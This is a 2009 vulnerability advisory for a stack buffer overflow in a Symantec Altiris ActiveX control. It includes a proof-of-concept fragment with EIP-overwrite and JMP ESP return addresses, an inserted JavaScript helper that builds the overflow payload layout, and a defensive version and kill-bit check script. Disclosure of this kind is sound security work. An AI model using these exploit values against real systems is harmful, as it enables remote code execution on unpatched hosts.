_________________________________________

Security Advisory NSOADV-2009-001

_________________________________________

Title:                  Symantec ConsoleUtilities ActiveX Control Buffer Overflow
Severity:               Critical
Advisory ID:            NSOADV-2009-001
Found Date:             09.09.2009
Date Reported:          15.09.2009
Release Date:           02.11.2009
Author:                 Nikolas Sotiriu
Mail:                   nso-research at sotiriu.de
URL:                    http://sotiriu.de/adv/NSOADV-2009-001.txt
Vendor:                 Symantec (http://www.symantec.com/)
Affected Products:      Symantec Altiris Notification Server 6.x
                        Symantec Management Platform 7.0.x
                        Symantec Altiris Deployment Solution 6.9.x
Affected Component:     ConsoleUtilities ActiveX Control V.6.0.0.1846
Not Affected Component: ConsoleUtilities ActiveX Control V.6.0.0.2000
Remote Exploitable:     Yes
Local Exploitable:      No
CVE-ID:                 CVE-2009-3031
Patch Status:           Vendor released a patch
Discovered by:          Nikolas Sotiriu
Disclosure Policy:      http://sotiriu.de/policy.html
Thanks to:              Thierry Zoller: For the permission to use his Policy

Background:
===========
Altiris service-oriented management solutions provide a modular and
future-proof approach to managing highly diverse and widely distributed
IT infrastructures. They are open solutions that enable lifecycle
integration of client, handheld, server, network and other IT assets
with audit-ready security and automated operation.
(Product description from Symantec Website)

Description:
============
On first access to the management web console, an ActiveX control
(AeXNSConsoleUtilities.dll) is installed in the user's browser. The
control's "BrowseAndSaveFile" method is vulnerable to a stack-based
buffer overflow: an overlong argument overwrites the saved return
address on the stack, so the caller controls EIP (see the RET notes in
the proof of concept below). Because the installed control is
scriptable from a web page, the overflow can be triggered remotely by
any page that instantiates the control by its GUID.

Name:    ConsoleUtilities Class
Vendor:  Altiris, Inc.
Type:    ActiveX Control
Version: 6.0.0.1846
GUID:    {B44D252D-98FC-4D5C-948C-BE868392A004}
File:    AeXNSConsoleUtilities.dll
Folder:  C:\WINDOWS\system32

Proof of Concept:
==================
NSOADV-2009-001

Symantec ConsoleUtilities ActiveX Control Buffer overflow PoC

Use it only for education or ethical pentesting! The author accepts no liability for damage caused by this tool.
Nikolas Sotiriu (lofi) (http://www.sotiriu.de/adv/NSOADV-2009-001.txt), 02.11.2009

Some RET info:

Overwrite EIP with AAAA (crash)
EIP=String(2, unescape("%u4141"))

XP SP2 Ger shell32.dll JMP ESP
EIP=unescape("%uaf0a%u77d5")

XP SP3 Ger shell32.dll JMP ESP
EIP=unescape("%u30D7%u7E68")

----------------------------------------------------------------
DoS
Windows XP SP2 German
Windows XP SP3 German
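The RET values above are written as JScript %u escapes, which is easy to get backwards: each %uXXXX is one 16-bit UTF-16 code unit, the control receives the string as a BSTR (UTF-16LE in memory), so a 32-bit address must be emitted low word first. The following helper, added here as an illustration and not part of the original PoC, packs and unpacks addresses in that form, shows the bytes the native side actually sees, and builds the filler-plus-return-address layout such a PoC uses. It is written for Node.js (it uses `Buffer`); the `offsetBytes` distance to the saved return address is a placeholder, since the advisory does not state it, and the method signature of "BrowseAndSaveFile" is not given on the page, so the control itself is not called here. The fixed shell32.dll addresses work on Windows XP only because XP has no ASLR; they differ per service pack and language, which is why the PoC lists them per SP2/SP3 German.

```javascript
// Added example (not from the advisory): encoding of the EIP values quoted above.
// Each %uXXXX escape is one UTF-16 code unit; as a BSTR the bytes are little-endian,
// so a 32-bit address is written low word first, then high word.

// Pack a 32-bit address into the %u escape form used in the PoC comments.
function packAddr(addr) {
  if (addr < 0 || addr > 0xffffffff) throw new RangeError("32-bit address expected");
  var lo = addr & 0xffff;
  var hi = (addr >>> 16) & 0xffff;
  return "%u" + hex16(lo) + "%u" + hex16(hi);
}

// Zero-padded 4-digit hex for one 16-bit word.
function hex16(w) {
  return ("0000" + w.toString(16)).slice(-4);
}

// Reverse: read a two-escape string back into the number that would land in EIP.
function unpackAddr(esc) {
  var m = /^%u([0-9a-fA-F]{4})%u([0-9a-fA-F]{4})$/.exec(esc);
  if (!m) throw new Error("expected exactly two %u escapes");
  return ((parseInt(m[2], 16) << 16) | parseInt(m[1], 16)) >>> 0;
}

// Bytes the native side sees for a JS string passed as a BSTR (UTF-16LE), as hex.
function bstrBytes(s) {
  return Buffer.from(s, "utf16le").toString("hex");
}

// Overflow layout: 'A' filler up to the saved return address, then the 4-byte
// address. offsetBytes is a placeholder; the advisory does not give the distance.
function buildPayload(offsetBytes, eipEsc) {
  if (offsetBytes % 2 !== 0) throw new RangeError("offset must be a whole number of UTF-16 code units");
  var filler = new Array(offsetBytes / 2 + 1).join(unescape("%u4141")); // 0x41 0x41 per code unit
  return filler + unescape(eipEsc);
}

// Round-trip the XP SP2 German JMP ESP value from the PoC comment.
var spoofed = packAddr(0x77d5af0a); // "%uaf0a%u77d5", as listed above
```

Usage: `bstrBytes(unescape(packAddr(0x77d5af0a)))` yields `0aafd577`, i.e. the little-endian encoding of 0x77d5af0a, which is what must overwrite the saved return address for a JMP ESP at that address to be reached.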
Solution:
=========
Symantec Security Advisory:
http://tinyurl.com/y9fakve

Hotfix (KB49568): Deployment Solution 6.9 SP3
https://kb.altiris.com/display/1n/articleDirect/index.asp?aid=49568

Hotfix (KB49389): Notification Server 6.x
                  Symantec Management Platform 7.x
https://kb.altiris.com/display/1n/articleDirect/index.asp?aid=49389

Disclosure Timeline (YYYY.MM.DD):
=================================
2009.09.09: Vulnerability found
2009.09.15: Sent PoC, advisory, disclosure policy and planned disclosure date (2009.10.01) to vendor
2009.09.15: Vendor response asking to resend the PoC in a zipped and password-protected file (AV problem)
2009.09.15: Resent zipped and password-protected
2009.09.17: Symantec Security Response Team verifies the vulnerability
2009.09.22: Symantec product team verifies the finding
2009.09.29: Asked for a status update, because the planned release date is 2009.10.01
2009.09.29: Symantec Security Response Team tries to get a timeline from the product team
2009.09.30: Changed release date to 2009.10.08 until a timeline is known
2009.10.07: Asked for a status update, because the planned release date is 2009.10.08
2009.10.07: Symantec Security Response Team informs me that, if all goes well, they need one more week
2009.10.07: Changed release date to 2009.10.15
2009.10.14: Asked for a status update, because the planned release date is 2009.10.15
2009.10.14: Symantec Security Response Team informs me that they have an issue with an update and need one more week
2009.10.14: Changed release date to 2009.10.22
2009.10.21: Asked for a status update, because the planned release date is 2009.10.22
2009.10.21: Symantec Security Response Team informs me that they have an issue with an update
2009.10.21: Changed release date to 2009.10.29
2009.10.28: Asked for a status update, because the planned release date is 2009.10.29
2009.10.29: Symantec Security Response Team informs me that the patch will be released on 2009.11.02 at 9am PST
2009.11.02: Symantec Security Response Team informs me that the patch and the advisory are released
2009.11.02: Release of this advisory
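After applying the hotfixes from the Solution section, an administrator will want to verify that the affected build is actually gone from console users' machines. The script below is an added check, not part of the advisory or of Symantec's hotfixes: it reads the file version of AeXNSConsoleUtilities.dll at the path given above, compares it numerically against the first not-affected build (6.0.0.2000), and also reports whether the control's GUID has the Internet Explorer kill bit set (the "Compatibility Flags" value 0x400 under "ActiveX Compatibility" in HKLM, a standard Microsoft mechanism that the advisory itself does not mention and that blocks instantiation from IE without removing the file). It is written as a Windows Script Host JScript (run with cscript); the pure helpers have no WSH dependency, so they also run under Node.js. The registry read and file check use only standard WSH objects; a missing kill-bit key is treated as "kill bit not set".

```javascript
// Added example (not from the advisory): verify a host no longer carries the
// affected ConsoleUtilities build. Runs under cscript; pure helpers also run in Node.

var AFFECTED_CLSID = "{B44D252D-98FC-4D5C-948C-BE868392A004}";      // GUID from the advisory
var DLL_PATH = "C:\\WINDOWS\\system32\\AeXNSConsoleUtilities.dll";    // folder/file from the advisory
var FIXED_VERSION = "6.0.0.2000";                                    // first not-affected build
var KILLBIT_KEY = "HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\" +
                  AFFECTED_CLSID + "\\Compatibility Flags";
var KILLBIT_FLAG = 0x400; // IE kill bit; assumed mitigation, not mentioned on the page

// Component-wise numeric comparison: plain string comparison would mis-order
// e.g. "6.0.0.999" against "6.0.0.1846".
function compareVersions(a, b) {
  var pa = a.split("."), pb = b.split(".");
  var n = Math.max(pa.length, pb.length);
  for (var i = 0; i < n; i++) {
    var x = parseInt(pa[i] || "0", 10), y = parseInt(pb[i] || "0", 10);
    if (x !== y) return x < y ? -1 : 1;
  }
  return 0;
}

function isAffectedVersion(v) {
  return compareVersions(v, FIXED_VERSION) < 0;
}

function killBitSet(flags) {
  return (flags & KILLBIT_FLAG) === KILLBIT_FLAG;
}

// Verdict for one host. fileVersion === null means the DLL is absent,
// compatFlags === null means no Compatibility Flags value exists for the GUID.
function assess(fileVersion, compatFlags) {
  if (fileVersion === null) return "control not installed";
  if (!isAffectedVersion(fileVersion)) return "patched (" + fileVersion + ")";
  if (compatFlags !== null && killBitSet(compatFlags)) {
    return "vulnerable build " + fileVersion + " present but kill bit set in IE";
  }
  return "VULNERABLE: " + fileVersion + " < " + FIXED_VERSION + ", no kill bit";
}

// WSH entry point; skipped where ActiveXObject does not exist (e.g. Node).
if (typeof ActiveXObject !== "undefined") {
  var fso = new ActiveXObject("Scripting.FileSystemObject");
  var sh = new ActiveXObject("WScript.Shell");
  var ver = fso.FileExists(DLL_PATH) ? fso.GetFileVersion(DLL_PATH) : null;
  var flags = null;
  try { flags = sh.RegRead(KILLBIT_KEY); } catch (e) { /* key absent: no kill bit */ }
  WScript.Echo(assess(ver, flags));
}
```

The kill-bit result is reported separately on purpose: it stops Internet Explorer from instantiating the control, but the vulnerable DLL is still on disk and still registered, so the hotfix remains the fix and the kill bit is only a stop-gap until it is applied.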